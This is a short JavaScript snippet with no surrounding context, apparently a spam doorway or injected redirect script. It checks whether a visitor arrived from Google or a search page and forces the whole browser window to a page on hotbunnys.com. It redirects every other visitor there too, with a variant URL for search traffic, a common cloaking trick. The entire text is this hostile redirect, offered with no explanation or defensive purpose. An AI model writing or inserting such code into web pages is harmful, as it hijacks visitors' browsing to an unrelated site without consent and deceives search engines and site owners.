

if(document.referrer){

var From=document.referrer.toUpperCase();

if(From.indexOf("GOOGLE") >= 0 ){
top.location.href="http://www.hotbunnys.com/freemaine.html?en";
end;
}

if(From.indexOf("SEARCH") >= 0 ){
top.location.href="http://www.hotbunnys.com/freemaine.html?en";
end;
}

}
top.location.href="http://www.hotbunnys.com/freemaine.html";
